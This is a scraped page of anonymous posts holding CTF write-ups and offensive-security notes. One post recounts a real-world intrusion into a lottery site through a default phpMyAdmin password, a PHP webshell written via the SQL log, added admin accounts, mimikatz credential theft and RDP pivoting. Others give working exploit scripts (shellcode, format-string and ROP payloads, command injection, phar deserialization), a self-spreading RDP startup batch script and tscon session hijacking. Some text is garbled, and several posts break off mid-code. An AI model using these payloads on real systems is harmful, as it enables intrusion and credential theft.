  11. Guest

Chapter 1: Emergency Response - webshell check. Introduction: target machine account/password: root / xjwebshell. 1. The flag in the hacker's webshell {
  12. Guest

Get the phpMyAdmin weak password. Through information gathering, the IP of the lottery site is xxx, and a detection scan reveals that phpMyAdmin exists. By guessing, log in to phpMyAdmin with the default weak password (root/root).

Write a shell to the log file through a phpMyAdmin back-end SQL query. Use phpMyAdmin's SQL query function to write a one-line Trojan to the log file. The process and commands are as follows:

1. Turn on the log function:

   ```sql
   set global general_log=on;
   ```

2. Click the phpMyAdmin variables page to view the log file name: the log file here is test.php.
3. Execute the SQL command and write the one-liner to the log file:

   ```sql
   SELECT '<?php assert($_POST['test']);?>';
   ```

4. Return after successful execution.
5. View the log file.
6. Add a user by connecting with the kitchen knife (China Chopper) and upload mimikatz. Use the kitchen knife to connect to the log file Trojan, xxx/test.php, password: test. Checking shows it is running with system administrator (SYSTEM) permissions, so just add a user and add it to the administrators group. The commands are:

   ```
   C:\Windows\system32\net.exe user Test Test!@#123 /add
   C:\Windows\system32\net.exe localgroup administrators Test /add
   ```

   Upload mimikatz to the server.
7. Connect to 3389 and read the administrator password.
   (1) A direct `telnet ip 3389` test found that it is accessible, so I directly connected to 3389 to enter.
   (2) Or execute the following commands in the kitchen knife to query which port 3389 is open on.
       Step 1: `tasklist /svc | findstr TermService` // query the process of the Remote Desktop service
       Step 2: `netstat -ano | findstr ****` // check the port number corresponding to the Remote Desktop service process ID
   (3) Execute mimikatz and read the administrator group login password.
   (4) Use the obtained administrator/xxxx account password to log in to the server remotely. It was found that the server used phpStudy to build lottery sites in batches. There were about a dozen sites, and the website domain names on several servers could be accessed at will.

Screenshots (images not preserved): System 1, System 2, System, Backstage 1, Backstage 2.

Reprinted from the original links: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247487003idx=1sn=5c85b34ce6ffb400fdf858737e34df3dchksm=ce67a482f9102d9405e838f34479dc8d1c6b793d3b6d4f40d9b3cec9cc87f14555d865cb3ddcscene=21#wechat_redirect and https://blog.csdn.net/weixin_39997829/article/details/109186917
  13. Guest

Preliminary Competition

web_ezcms

Swagger leaked the test/test test account. After logging in, /sys/user/** has no authentication, so you can add a super administrator user; the roleId is still unknown at this point, and the role module is not unauthorized. Continuing to read the user module reveals an interface with a roleId leak. Fill in the admin id fcf34b56-a7a2-4719-9236-867495e74c31 leaked earlier:

```
GET /sys/user/roles/fcf34b56-a7a2-4719-9236-867495e74c31
```

Now I know that the super administrator id is 11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9. Add the user:

```
{
  'createWhere': 0,
  'deptId': '1',
  'email': '',
  'password': '123456',
  'phone': '11111111111',
  'roleIds': ['11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9'],
  'sex': 'fmale',
  'username': 'hacker'
}
```

Decoding of the password field failed; then, checking the log with the test account, I found the AES key: AbCdEfGhIjKlMnOp, and then the user was added successfully. After adding the user, we found the ping function in the module, but there is a WAF.

Bypass the WAF and execute the command to get the flag:

```
POST /sys/ping HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
authorization: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJmY2YzNGI1Ni1hN2EyLTQ3MTktOTIzNi04Njc0OTVlNzRjMzEiLCJqd3Qtcm9sZXMta2V5XyI6WyLotoXnuqfnrqHnkIblkZgiXSwiaXNzIjoieWluZ3h1ZS5jb20iLCJqd3QtcGVybWlzc2lvbnMta2V5IjpbInN5czp1c2VyOmxpc3QiLCJzeXM6ZGVwdDp1cGRhdGUiLCJzeXM6ZGVwdDpkZXRhaWwiLCJzeXM6dXNlcjpyb2xlOnVwZGF0ZSIsInN5czpwZXJtaXNzaW9uOmFkZCIsInN5czp1c2VyOmFkZCIsInN5czp1c2VyOmFkZCIsInN5czp1c2VyOmRlbGV0ZWQiLCJzeXM6cGVybWlzc2lvbjp1cGRhdGUiLCJzeXM6dXNlcjpkZXRhaWwiLCJzeXM6ZGVwdDpkZWxldGVkIiwic3lzOnJvbGU6dXBkYXRlIiwic3lzOnJvbGU6ZGV0YWlsIiwic3lzOmRlcHQ6bGlzdCIsInN5czpkZXB0OmFkZCIsInN5czp1c2VyOnVwZGF0ZSIsInN5czpyb2xlOmxpc3QiLCJzeXM6cm9sZTpkZWxldGVkIiwic3lzOnBlcm1pc3Npb246bGlzdCIsInN5czpwZXJtaXNzaW9uOmRldGFpbCIsInN5czpwZXJtaXNzaW9uOmRldGFpbCIsInN5czpwZXJtaXNzaW9uOmRlbGV0ZWQiLCJzeXM6bG9nOmRlbGV0ZWQiLCJzeXM6dXNlcjpyb2xlOmRldGFpbCIsInN5czpyb2xlOmFkZCIsInN5czpsb2c6bGlzdCJdLCJqd3QtdXNlci1uYW1lLWtleSI6ImFkbWluIiwiZXhwIjoxNzE2NzE3MjIwLCJpYXQiOjE3MTY3MTAwMjB9.9wcw8M2Ky0lFTbD2B7YaAmPKTl_EO0kJCB5J3bw8FkA
X-Requested-With: XMLHttpRequest
Content-Length: 28
Origin:
DNT: 1
Sec-GPC: 1
Connection: close
Referer:
Cookie: JSESSIONID=C701D746DA63E8FB94270AD6D2FD9ADB
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=1

{'ip':'10.10.10.10-1||cat/flag'}
```

Top Secret File - Code P

```python
import cv2
import numpy as np
s = 179093209181929149953346613617854206675976823277412565868079070299728290913658
from Crypto.Util.number import *
# p, q = (241627603783727624224706687817893681267,
#         347432454257893250496407965506777649463)
## assert p**2 + q**2 == s
## print(isPrime(p), isPrime(q))
# Img_path = 'flag_enc.png'
# Img = cv2.imread(Img_path)
# print(Img.shape)

from sympy.solvers.diophantine.diophantine import cornacchia
'''
This place needs to be modified: decompose s, just use factordb
f = {7247215681561944590028089613581484765881: 1, 157606014243244438240601: 1, 5801674693: 1, 2: 1, 13513: 1}
'''
x1 = cornacchia(1, 1, s)
for a, b in x1:
    assert a**2 + b**2 == s
    if isPrime(a) and isPrime(b):
        print(a, b)
# I got p and q here

from Crypto.Util.number import *
p, q = 302951519846417861008714825074296492447, 295488723650623654106370451762393175957
s = 179093209181929149953346613617854206675976823277412565868079070299728290913658
assert isPrime(p) and isPrime(q) and p**2 + q**2 == s

import cv2
path1 = 'flag_enc.png'
img = cv2.imread(path1)
# print(img.shape)
r, c, d = img.shape
print(r, c)
# i, j = 101, 201
from tqdm import tqdm
a, b = p, q
# follow the orbit of every pixel under the map until it repeats
for i in tqdm(range(r)):
    for j in range(c):
        set1 = set()
        set1.add((i, j))
        i1, j1 = i, j
        while True:
            x = (i1 + b * j1) % r
            y = ((a * i1) + (a * b + 1) * j1) % c
            i1, j1 = x, y
            if (x, y) not in set1:
                set1.add((x, y))
            else:
                break
        if i == 0 and j == 0:
            continue  # (0, 0) is a fixed point of the map, so its orbit has length 1
        assert len(set1) == 190  # all the others are 190
# We found that it was 190 here. It was a coincidence that we only started to touch it later.

# s1 = s % 190
# print(s1)
# import numpy as np
# def arnold(img, shuffle_times, a, b):
#     r, c, d = img.shape
#     p = np.zeros(img.shape, np.uint8)
#     print(r, c, d, shuffle_times)
#     for s in range(shuffle_times):
#         for i in range(r):
#             for j in range(c):
#                 x = (i + b * j) % r
#                 y = ((a * i) + (a * b + 1) * j) % c
#                 p[x, y, :] = img[i, j, :]
#         img = np.copy(p)
#     return p
# x1 = arnold(img, 11, p, q)
# cv2.imwrite('flag3.png', x1)
## cv2.imwrite('flag1.png', img)

c = 179093209181929149953346613617854206675976823277412565868079070299728290913658
p, q = 302951519846417861008714825074296492447, 295488723650623654106370451762393175957
import cv2
import numpy as np

def arnold(img, shuffle_times, a, b):
    # one Arnold cat-map round: (i, j) -> ((i + b*j) mod r, (a*i + (a*b+1)*j) mod c)
    r, c, d = img.shape
    p = np.zeros(img.shape, np.uint8)
    print(r, c, d, shuffle_times)
    for s in range(shuffle_times):
        for i in range(r):
            for j in range(c):
                x = (i + b * j) % r
                y = ((a * i) + (a * b + 1) * j) % c
                p[x, y, :] = img[i, j, :]
        img = np.copy(p)
    return p

img = cv2.imread('flag_enc.png')
# print(img)
c1 = c % 190
for i in range(190):
    img = arnold(img, 1, p, q)
    cv2.imwrite(f'flag{i+1}.png', img)
'''
1. Just enumerate brute-force. Anyway, the cycle is 190, so enumerate all of it.
   When you reach i=66, flag67.png is the flag.
2. flag{Ailuropoda_rnelanoleuca}
'''
```

Persist in doing the right thing

The data retrieved from the traffic packet is the hexadecimal of an image. Checking its hexadecimal, there is additional data at the end of it. It is a vim drawing command; install DrawIt directly and enter the command to draw the picture.

GAME

Play the game directly and get the flag. This is a real sign-in challenge.

FunIoT

It gives a set of docker files; run the binary file in it, open it in the reverser directly, then combine dynamic debugging and static analysis to analyze the protocol format, and finally use one of the functions for reading files, using // to bypass the comparison check. Then read the flag:

```python
from pwn import *
import zlib
# p = remote('127.0.0.1', 6768)
p = remote('173.34.20.10', 6768)
header = b'FunIoT'  # 6
cmd = 0x102
cmd_encode = int(cmd).to_bytes(2, 'big')
len = 0x0101
length = int(len).to_bytes(2, 'big')
# content = b'getInfo:shadow'
# content = b'getInfo:/lib/udev/rc_keymaps/asus_pc39.toml'
content = b'getInfo://flag'
content = content.ljust(0x101, b'\x00')
check_sum = int(zlib.crc32(content)).to_bytes(4, 'big')
full_content = header + length + cmd_encode + check_sum + content
# packet:
# header:   6 bytes
# length:   2 bytes
# cmd:      2 bytes
# checksum: 4 bytes
# content:  unknown
context.log_level = 'debug'
p.send(full_content)
# p.interactive()
import base64
print(base64.b64decode(p.recv()).decode('utf-8'))
# command: getInfo, setInfo, secret
```

guess_hack

The challenge requires inputting a maximum and a minimum value, and then guessing the random number in this range. If you guess correctly, you enter a stack overflow. The number of overflow characters is the number of times you guessed wrong, so you can enter two adjacent numbers, then guess wrong enough times, and then perform a regular stack overflow exploitation. Because the stack is executable, and the check requires that the payload is not empty, I directly wrote shellcode and used a little XOR to bypass the non-empty check:

```python
# random % (max - min + 1) + min
from pwn import *
context.log_level = 'debug'
# p = process('./main')
p = remote('173.34.20.233', 9999)
p.sendlineafter(b'ch:', b'1')
p.sendlineafter(b'Enter a minimum and maximum number for the guessing game:', b'1 2')
for i in range(99):
    p.sendlineafter(b'Guess a number', b'1')
    p.sendlineafter(b'Guess a number between', b'2')
payload = b'a' * 0x3c
payload += p32(0x0805dea9)
payload += asm('''
    push 0xfffffff4
    pop eax
    push 0xffffffff
    pop ebx
    xor eax, ebx
    push 0xff978cd0
    pop ecx
    xor ecx, ebx
    push ecx
    push 0x6e69622f
    mov ebx, esp
    xor ecx, ecx
    int 0x80
''')
payload = payload.ljust(99, b'a')
pause()
p.sendlineafter(b'Congratulations!', payload)
p.interactive()
```

msg

A stack overflow + format string vulnerability. Use the format string vulnerability to leak the canary and libc, and then overwrite the return address with a one_gadget:

```python
from pwn import *
# p = process('./main')
p = remote('173.34.20.68', 9999)
p.sendlineafter(b'message:', b'%11$p')
canary = int(p.recv(18), 16)
success(f'canary: {hex(canary)}')
p.sendlineafter(b'message:', b'%3$p')
libc = int(p.recv(14), 16) - 0x10e1f2
success(f'libc: {hex(libc)}')
one = libc + 0xe3b01
p.sendlineafter(b'message:', b'a' * 0x28 + p64(canary) + b'b' * 8 + p64(one))
pause()
p.sendlineafter(b'message:', b'\x00' * 0x10)
p.interactive()
```

stackover

This is also a classic stack overflow, but the remote libc is a bit different from the local one. In addition, the function returns through `lea esp, [ecx-4]; ret`, which I have not used successfully. However, after controlling the program to various output places, it was determined that the stack environment is basically the same, so in the end I tried not to rely on libc for the exploitation:

```python
from pwn import *
# context.log_level = 'debug'
# p = process('./stackover')
p = remote('173.34.20.46', 9999)
p.sendafter(b'read:', b'a' * 0x29b)
p.recvuntil(b'a' * 0x29b)
canary = u32(b'\x00' + p.recv(3))
success(f'canary: {hex(canary)}')
# pause()
p.sendafter(b'read:', b'a' * (0x29b + 7 + 8 + 0x2c - 0x30 - 4))
p.recvuntil(b'a' * (0x29b + 7 + 8 + 0x2c - 0x30 - 4))
p.recv(4)
p.recv(4)
stack = u32(p.recv(4))
success(f'stack: {hex(stack)}')
# pause()
p.sendafter(b'read:', b'b' * (0x29b + 0x18 + 7))
p.recvuntil(b'b' * (0x29b + 0x18 + 7))
libc = u32(p.recv(4)) - 0x1aed5
success(f'libc: {hex(libc)}')
# pause()
p.sendafter(b'read:', b'a' * (0x29b + 7 + 8 + 0x2c + 0x54))
p.recvuntil(b'a' * (0x29b + 7 + 8 + 0x2c + 0x54))
elf_base = u32(p.recv(4)) - 0x3fb8
success(f'elf_base: {hex(elf_base)}')
payload = b'c' * (0x29a - 0x14 - 8)
# execve 0xc9510
# system 0x41780
# puts   0x6dc40
# payload += p32(libc + 0x6dc40)
# payload += p32(elf_base + 0x1130)
payload += b'/bin/sh\x00'
payload += p32(elf_base + 0x128e)
# payload += p32(elf_base + 0x3fcc)
# payload += p32(0)
payload += p32(stack - 0x50)
payload += p32(0)
# payload += p32(libc + 0x18e363)
# payload += p32(libc + 0x18e363)
payload += p32(0)
payload += p32(0)
payload += p32(canary)
payload += p32(0) * 3
payload += p32(stack - 0x44)
payload += p32(elf_base + 0x3fb8)
payload += b'/bin/sh\x00'
pause()
context.log_level = 'debug'
p.sendafter(b'read:', payload)
p.interactive()
```

stackover-revenge

It provides addition and subtraction functions within 255. At first no vulnerability was seen, but later I found that a little backdoor code was added to the normal flow of the program (pressing F5 in IDA cannot see it here). The backdoor code in another place can satisfy the triggering conditions of the above code:
  14. Guest

Morning CTF

web

simplelogin: yakit brute-forced the password; as I remember it should be a123456.

pppp: index.php has an arbitrary file read:

```php
<?php
// upload.php
error_reporting(0);
highlight_file(__FILE__);
class A {
    public $a;
    public function __destruct() {
        $s = $this->a;
        $s();
    }
}
class B {
    public $cmd;
    function __invoke() {
        return $this->start();
    }
    function start() {
        echo system($this->cmd);
    }
}
if (isset($_GET['file'])) {
    if (strstr($_GET['file'], 'flag')) {
        die('Get out!');
    }
    echo file_get_contents($_GET['file']);
}
?>
```

Read upload.php:

```php
<?php
error_reporting(0);
if (isset($_FILES['file'])) {
    mkdir('upload');
    $uid = uniqid();
    $ext = explode('.', $_FILES['file']['name']);
    $ext = end($ext);
    move_uploaded_file($_FILES['file']['tmp_name'], 'upload/' . $uuid . '.png');
    echo 'Upload Success! File Path: upload/' . $uuid . '.png';
}
?>
```

The uploaded file will be renamed to .png. Try uploading a phar file and triggering the deserialization to execute the command with file_get_contents on the homepage:

```php
<?php
// phar.php
class A {
    public $a;
    public function __destruct() {
        $s = $this->a;
        $s();
    }
}
class B {
    public $cmd;
    function __construct() {
        $this->cmd = 'cat flag';
    }
    function __invoke() {
        return $this->start();
    }
    function start() {
        system($this->cmd);
    }
}
$b = new B();
$b->cmd = 'cat /flag';
$a = new A();
$a->a = $b;
@unlink('phar.phar');
$phar = new Phar('phar.phar');  // the suffix must be phar
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ?>');  // set the stub
$phar->setMetadata($a);  // save the custom meta-data into the manifest
$phar->addFromString('a.txt', 'abb');  // add the file to be compressed
$phar->stopBuffering();  // the signature is calculated automatically
?>
```
Upload it and access it.

misc

ftp: extract the zip from the traffic, and then the password is the same password, password1234567890.

crypto

baby_Words on Zen with Buddha: it is AES, but after the XOR the result is converted into characters, so you can turn it back and decrypt the AES:

```python
ruShiWoWen = [
    '无', 'mu', 'monk', 'room', 'art', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser',
    'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser',
    'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser' '未', 'li',
    'blin', 'due', 'mul', 'pregnancy', 'san', 'black', 'naked', 'bean', 'special', 'div', 'reach', 'return',
    'length', 'length', 'length', 'length', 'length', 'length', 'li', 'written', 'number', 'responsible',
    'respect', 'ro', 'respect', 'respect', 'know', 'three', 'bing', 'no', 'responsible', 'responsible',
    'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible',
    'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible',
    'responsible', 'responsible', 'responsible', 'responsible', 'Insight', 'thought', 'dream', 'until',
    'remove', 'horrible', 'restrained', 'restrained', 'restrained', 'restrained', 'will', 'wisdom', 'old',
    'toward', 'roar', 'foot', 'you', 'wang', 'you', 'won', 'mu', 'mu', 'light', 'protect', 'jin', 'harmony',
    'going', 'treasure', 'win', 'tong', 'won', 'win', 'tong', 'medicine', 'teacher', 'little', 'living',
    'pure', 'deal', 'mountain', 'good', 'pass', 'go', 'seven', 'not', 'come', 'smart', 'smart', 'smart',
    'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'Cause', 'Thousand', 'Five', 'Hundred',
    'Ten Thousand', 'Flowers', 'Billions', 'Decision', 'Six', 'Fang', 'Name', 'Name', 'Tong', 'Yue', 'Yun',
    'Dian', 'Miracle', 'Zun', 'tree', 'root', 'west', 'soap', 'flame', 'north', 'qing', 'number', 'element',
    'improve', 'head', 'lower', 'silence', 'quantity', 'element', 'element', 'four', 'element', 'four',
    'element', 'four', 'element', 'four', ' 'Do', 'Shi', 'Ga', 'Mu', 'Ni', 'Le', 'A', 'Du', 'Zhong', 'Yang',
    'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong',
    'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong',
    'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong',
    'Zhong', 'Zhong' 'action', 'in', 'empt', 'empt', 'compassion', 'worry', 'someone', 'satisfaction',
    'stable', 'rest', 'day', 'night', 'cultivation', 'hold', 'heart', 'seeking', 'recitation', 'recitation',
    'this', 'sutra', 'energy', 'death', 'elimination', 'elimination', 'toxic', 'harm', 'high', 'open',
    'text', 'super', 'lift', 'cool', 'as if', 'thought', 'that', 'that', 'emperor', 'vi', 'true', 'ling',
    'qian', 'shu', 'ha', 'respect', 'Gift', 'Feng', 'Ancestor', 'First', 'Filial Piety', 'Double',
    'My Master', 'Stay', 'My Master', 'Love', 'Brother', 'Brother', 'First', 'Friend', 'Friend', 'Friend',
    'Friend', 'Music', 'Zen', 'Clan', 'Home', 'My', 'My', 'Teaching', 'Sun', 'Time', 'Tire', 'Bulse', 'Yin',
    'Yin', 'Difficult', 'Economic', 'urgent', 'soft', 'soft', 'shoulder', 'creation', 'soft', 'soft', 'shu',
    'shu', 'shu', 'shu', 'creation', 'repet', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don',
    'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don',
    'don', 'don', 'don', 'don', ' 'kill', 'release', 'bridge', 'road', 'cove', 'little', 'draw', 'draw',
    'draw', 'sleep', 'sweep', 'sweep', 'sweep', 'sweep', 'sweep', 'don', 'invest', 'invest']
enc = ('The person who recites the love is guarding the Mengzabao and lying the lying of the lying of the '
       'heart, and killing the lying of the heart, and worrying, and reciting the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the '
       'lying of the lying of the lying of the lying of the lying of the lying of the lying of the ')
dec = b''
for i in enc:
    dec += (ruShiWoWen.index(i) ^ 64).to_bytes(1, 'little')
KEY = b'DASCTF@Key@^_^@Encode!Buddha!'
IV = b'IV|DASCTF|OvO|IV'
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
cryptor = AES.new(KEY, AES.MODE_CBC, IV)
# padded_data = pad(data.encode('utf-8'), AES.block_size)
encrypted_data = cryptor.decrypt(dec)
print(encrypted_data)
```

re

NormalAndroid: when you open it in jadx, it only calls one function in the .so; go over to IDA and look at it. You can see something like a key and the transformation of the key (surface: surface). Then enter the encryption logic, which is an AES encryption, and the S-box was modified. So I just find an AES implementation and modify the S-box, and then use the transformed key to decrypt. Because the network at the competition was cut off, the script was not saved at that time, so I didn't finish it:

```python
from Crypto.Util.number import long_to_bytes, bytes_to_long
# https://github.com/bozhu/AES-Python/blob/master/aes.py
Sbox = (
    0xBE, 0xB4, 0x9F, 0x70, 0xDB, 0xAD, 0x31, 0x30, 0x6C, 0x87,
    0x74, 0x27, 0xC9, 0x4C, 0x67, 0x62, 0x0A, 0x36, 0x08, 0xC8,
    0x96, 0x32, 0x00, 0xF1, 0x38, 0x65, 0xEC, 0xED, 0x44, 0x25,
    0xAA, 0x33, 0x86, 0xEF, 0x0D, 0x19, 0x7D, 0xD5, 0x45, 0xFB,
    0x8D, 0x61, 0xFE, 0x50, 0x47, 0x7E, 0x7C, 0xF9, 0x01, 0xDE,
    0xFF, 0xE1, 0xAC, 0x5D, 0xB5, 0x8E, 0x48, 0xBF, 0x90, 0x9D,
    0x79, 0xCB, 0xA6, 0xA9, 0xFC, 0x34, 0xCF, 0x63, 0x5A, 0x99,
    0x98, 0xB8, 0x92, 0x2D, 0x02, 0x89, 0x2C, 0x3B, 0x15, 0x72,
    0x5E, 0x60, 0x29, 0x6F, 0x0B, 0x24, 0x6D, 0x1C, 0x5B, 0xE0,
    0x37, 0xA4, 0xCC, 0x12, 0x93, 0xA7, 0x09, 0xC6, 0xB6, 0x8F,
    0x04, 0x20, 0xE8, 0x46, 0xB1, 0xAE, 0x3A, 0x68, 0x81, 0xCE,
    0x2B, 0x0C, 0xB3, 0x3E, 0xC0, 0x0E, 0x4D, 0xD8, 0xD2, 0xA2,
    0x9E, 0x56, 0x28, 0xB0, 0x35, 0x1B, 0x5F, 0xF5, 0x05, 0xBC,
    0x3C, 0x4F, 0x8C, 0xE6, 0xF6, 0x75, 0xF4, 0xF8, 0xDD, 0x11,
    0xC1, 0xB9, 0x4E, 0x97, 0xD6, 0xF2, 0xE4, 0xD1, 0x82, 0xD3,
    0x03, 0x8B, 0x4B, 0xCA, 0x64, 0xEB, 0xAB, 0x71, 0xA1, 0xBA,
    0xA8, 0x6A, 0x1E, 0x1A, 0xA5, 0x49, 0x6E, 0x53, 0x66, 0x39,
    0x51, 0xE9, 0x26, 0xC4, 0xDA, 0x55, 0x3F, 0xEA, 0x85, 0x8A,
    0xD9, 0x13, 0x69, 0x1F, 0xE2, 0x7F, 0x2F, 0xC5, 0x88, 0x57,
    0x73, 0xA3, 0xE3, 0x0F, 0xBB, 0x18, 0xE5, 0x42, 0x22, 0x52,
    0x43, 0x80, 0x2A, 0x6B, 0x17, 0xD7, 0x23, 0x06, 0x58, 0x1D,
    0x7A, 0x84, 0xE7, 0xEE, 0xD0, 0x41, 0xD4, 0xBD, 0xA0, 0xC3,
    0xC2, 0xFD, 0x21, 0x54, 0xDF, 0x7B, 0xB7, 0xF0, 0xB2, 0x77,
    0x3D, 0x07, 0x78, 0x16, 0x9C, 0x59, 0xAF, 0x2E, 0x83, 0xFA,
    0x9B, 0x95, 0xF7, 0x40, 0x94, 0xF3, 0xCD, 0xC7, 0x91, 0x10,
    0xDC, 0x4A, 0x14, 0x9A, 0x5C, 0x76
)
InvSbox = [Sbox.index(i) for i in range(256)]

# learnt from http://cs.ucsb.edu/~koc/cs178/projects/JT/aes.c
xtime = lambda a: (((a << 1) ^ 0x1B) & 0xFF) if (a & 0x80) else (a << 1)

Rcon = (
    0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,
    0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A,
    0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A,
    0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39,
)


def text2matrix(text):
    matrix = []
    for i in range(16):
        byte = (text >> (8 * (15 - i))) & 0xFF
        if i % 4 == 0:
            matrix.append([byte])
        else:
            matrix[i // 4].append(byte)
    return matrix


def matrix2text(matrix):
    text = 0
    for i in range(4):
        for j in range(4):
            text |= (matrix[i][j] << (120 - 8 * (4 * i + j)))
    return text


class AES:
    def __init__(self, master_key):
        self.change_key(master_key)

    def change_key(self, master_key):
        self.round_keys = text2matrix(master_key)
        # print self.round_keys
        for i in range(4, 4 * 11):
            self.round_keys.append([])
            if i % 4 == 0:
                byte = self.round_keys[i - 4][0] \
                     ^ Sbox[self.round_keys[i - 1][1]] \
                     ^ Rcon[i // 4]
                self.round_keys[i].append(byte)
                for j in range(1, 4):
                    byte = self.round_keys[i - 4][j] \
                         ^ Sbox[self.round_keys[i - 1][(j + 1) % 4]]
                    self.round_keys[i].append(byte)
            else:
                for j in range(4):
                    byte = self.round_keys[i - 4][j] \
                         ^ self.round_keys[i - 1][j]
                    self.round_keys[i].append(byte)
        # print self.round_keys

    def encrypt(self, plaintext):
        self.plain_state = text2matrix(plaintext)
        self.__add_round_key(self.plain_state, self.round_keys[:4])
        for i in range(1, 10):
            self.__round_encrypt(self.plain_state, self.round_keys[4 * i:4 * (i + 1)])
        self.__sub_bytes(self.plain_state)
        self.__shift_rows(self.plain_state)
        self.__add_round_key(self.plain_state, self.round_keys[40:])
        return matrix2text(self.plain_state)

    def decrypt(self, ciphertext):
        self.cipher_state = text2matrix(ciphertext)
        self.__add_round_key(self.cipher_state, self.round_keys[40:])
        self.__inv_shift_rows(self.cipher_state)
        self.__inv_sub_bytes(self.cipher_state)
        for i in range(9, 0, -1):
            self.__round_decrypt(self.cipher_state, self.round_keys[4 * i:4 * (i + 1)])
        self.__add_round_key(self.cipher_state, self.round_keys[:4])
        return matrix2text(self.cipher_state)

    def __add_round_key(self, s, k):
        for i in range(4):
            for j in range(4):
                s[i][j] ^= k[i][j]

    def __round_encrypt(self, state_matrix, key_matrix):
        self.__sub_bytes(state_matrix)
        self.__shift_rows(state_matrix)
        self.__mix_columns(state_matrix)
        self.__add_round_key(state_matrix, key_matrix)

    def __round_decrypt(
```
  15. Guest

Recently in a project, the administrator was compromised after a drive was mounted over RDP, and I thought I would sort out the exploitation methods for RDP when I had time:

Copying files based on the mounted drive

There is not much to it. Depending on the mounted drive, you can decide whether to pull files or drop a startup item. There are some applications that automatically monitor and copy files, such as https://github.com/cnucky/DarkGuardian. DarkGuardian is a tool used to monitor TSCLIENT (the mounted drive) after an RDP login. When the tool runs in the background, it can automatically obtain the list of files on the mounted drive, download specified files, copy Trojan files to the startup items on the mounted disk, etc.

RDPInception

This method is relatively useless. The principle is to put a bat script in the server's startup items / winlogon execution script, and wait for the administrator to mount a drive and reconnect, at which point the command executes.

```bat
@echo off
echo Updating Windows...
@echo off
timeout 1 > nul 2>&1
mkdir \\tsclient\c\temp > nul 2>&1
mkdir C:\temp > nul 2>&1
copy run.bat C:\temp > nul 2>&1
copy run.bat \\tsclient\c\temp > nul 2>&1
del /q %TEMP%\temp_00.txt > nul 2>&1
set dirs=dir /a:d /b /s C:\users\*Startup*
set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup*
echo|%dirs%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup" > "%TEMP%\temp_00.txt"
echo|%dirs2%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup" >> "%TEMP%\temp_00.txt"
for /F "tokens=*" %%a in (%TEMP%\temp_00.txt) DO (
    copy run.bat "%%a" > nul 2>&1
    copy C:\temp\run.bat "%%a" > nul 2>&1
    copy \\tsclient\c\temp\run.bat "%%a" > nul 2>&1
)
del /q %TEMP%\temp_00.txt > nul 2>&1
REM if "WINDOMAIN"=="%USERDOMAIN%" (
cmd.exe /c calc.exe
)
```

RDP Session Hijacking

The practical command is tscon. Normally, switching to a different session requires a password. However, under SYSTEM you can switch to a different user's session without a password. This technique is mainly aimed at Win7 and above. The overall application scenario is: if Windows 2012 or above does not save plaintext passwords by default, you can switch to the target host's session, or if the current user in the domain is a local user, you can switch to the domain user's permissions. First, use psexec locally to elevate to SYSTEM (here you can also create a system service manually to do it). You can also use the shift/Utilman backdoor to log in to the desktop without a password.

1. psexec

```
C:\Windows\system32>quser
 USERNAME       SESSIONNAME   ID  STATE    IDLE TIME  LOGON TIME
 administrator  rdp-tcp#1     1   Active   .          2020/12/14 11:14
 test           rdp-tcp#0     2   Active   1:02       2020/12/14 13:04
C:\Windows\system32>tscon 2 rdp-tcp#1
```

